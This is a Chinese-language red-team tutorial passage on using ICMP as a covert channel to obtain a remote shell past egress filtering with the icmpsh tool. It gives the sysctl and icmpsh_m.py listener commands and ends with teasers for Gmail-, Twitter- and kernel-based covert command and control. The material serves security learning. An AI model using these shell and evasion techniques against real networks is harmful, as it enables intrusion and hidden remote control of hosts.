內部網路中的大多數系統都位於防火牆和公司**之後,以便控制入站和出站internet流量。防火牆可以阻止反向並繫結tcp連線。但是大多數情況下允許icmp流量。因此,可以將此協議用作隱蔽通道,以便獲取shell並在目標主機上遠端執行命令。
這是一種古老的技術,在有限的環境中大多數時候都使用它來接收shell,但現在隨著紅隊交戰的蔓延,它可以作為另一種方法,通過使用icmp流量和繞過出口過濾來執行命令。
工具icmpsh可用於有效地執行此攻擊。bernardo damele將其匯入到工具sqlmap中,該工具可以使用-os-pwn開關觸發。
以下命令將禁用所有icmp回應應答,這對於工具正常工作至關重要,並將啟動乙個等待來自目標主機的icmp資料報的偵聽器:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.100.3 192.168.100.4
shell將通過icmp接收,並且可以通過此通道執行命令。
daniel compton開發了乙個指令碼來自動化該過程。此指令碼所需的唯一輸入是目標主機的ip位址。該指令碼包含在github上的icmpsh儲存庫中。
nishang框架包含乙個powershell模組,可以與icmpsh python指令碼結合使用,以獲得icmp上的shell。在主機上,以下命令將等待任何傳入的icmp資料報。
將從主控主機接收連線。
基礎篇 7 隱匿攻擊之Gmail
gmail為使用者和企業提供電子郵件功能。這意味著允許大多數組織中的gmail伺服器流量。來自另一方的紅隊操作需要盡可能隱蔽,因此使用icmp和smtp 等合法協議來執行命令到受感染的主機是必不可少的。為此,web gcat和gdog上有兩個重要的工具,它們都可以使用gmail作為命令和控 務器。g...
基礎篇 9 隱匿攻擊之Twitter
社交 網路是公司營銷團隊的乙個很好的工具。如果使用得當,他們往往會吸引新的業務。因此,幾乎不可能將流量阻塞到twitter和facebook等社交 平台。它可以用於測試的優點是因為有各種命令和控制工具可以隱藏他們在社交 網路流量背後的活動。使用twitter的乙個公知的命令和控制工具叫做twitto...
基礎篇 16 隱匿攻擊之Kernel
現代環境實施不同級別的安全控制,如端點解決方案,主機入侵防禦系統,防火牆和實時事件日誌分析。另一方面,紅隊參與試圖逃避這些控制,以避免被發現。但是,大多數工具會通過生成各種事件日誌在網路級別或主機級別上產生某種雜訊。rj mcdown和約書亞theimer已經發布了乙個工具叫redsails中間de...